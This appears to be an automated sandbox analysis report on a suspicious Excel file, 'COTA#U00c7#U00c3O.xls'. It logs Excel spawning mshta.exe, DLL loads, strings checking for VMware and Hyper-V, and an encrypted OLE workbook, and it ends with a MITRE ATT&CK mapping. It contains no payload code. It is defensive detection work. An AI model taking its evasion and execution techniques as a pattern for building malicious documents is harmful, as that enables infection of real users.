Source: EXCEL.EXE, 00000000.00000002.4130078724.00000121DAFE1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT tenant_token FROM events ORDER BY persistence ASC, timestamp ASC LIMIT MAX(1,(SELECT COUNT(record_id) FROM events)* ? / 100)A28F7CB};{8265A5EF-46C7-4D46-812C-076F2A28F7CB};{8265A5EF-46C7-4D46-812C-176F2A28F7CB};{8265A5EF-46C7-4D46-812C-176F2A28F7CB};{6C3DC9F9-B616-4849-8F45-F02439482948};{6C3DC9F9-B616-4849-8F45-102439482948};{DACE5A15-C57C-44DE-9AFF-89B4412485AF};{DACE5A15-C57C-44DE-9AFF-19B4412485AF};{74F233A9-A17A-477C-905F-853F5FCDAD40};{74F233A9-A17A-477C-905F-153F5FCDAD40};{FD5B39A3-4CAC-4A3F-BD50-485BD6DDD983};{FD5B39A3-4CAC-4A3F-BD50-185BD6DDD983}:308;470;2619;11529;11690;11920;11924;12119;13915;13916;14014;14098;14099;14409;14606;14842;14848
Source: COTA#U00c7#U00c3O.xlsVirustotal: Detection: 25%
Source: COTA#U00c7#U00c3O.xlsReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 4084
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7468 -s 1976
Source: C:\Windows\System32\WerFault.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /restore
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\COTA#U00c7#U00c3O.xls"
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\System32\WerFault.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /restoreJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: c2r64.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEDirectory created: C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: COTA#U00c7#U00c3O.xlsInitial sample: OLE indicators encrypted = True
Source: Amcache.hve.LOG1.10.drBinary or memory string: bcdedit.exe|ac227fd116781fea
Source: Amcache.hve.LOG1.10.drBinary or memory string: c:\windows\system32\bcdedit.exe
Source: Amcache.hve.LOG1.10.drBinary or memory string: bcdedit.exe
Source: Amcache.hve.10.drBinary or memory string: bcdedit.exe|ac227fd116781fea
Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\bcdedit.exe
Source: Amcache.hve.10.drBinary or memory string: bcdedit.exe
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: COTA#U00c7#U00c3O.xlsStream path 'Workbook' entropy: 7.99836815431 (max. 8.0)
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
Source: EXCEL.EXE, 00000000.00000002.4113938463.00000121D7B43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMWare, Inc.
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware20,1
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: amneVMware-42 27 fa b8 1c 1
Source: EXCEL.EXE, 00000000.00000002.4109988686.00000121CA030000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: EXCEL.EXE, 00000000.00000002.4113441379.00000121D7820000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 fa b8 1c 1
Source: EXCEL.EXE, 00000000.00000002.4109988686.00000121CA0AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-USn
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA333000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.LOG1.10.dr, Amcache.hve.10.drBinary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Bootkit		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
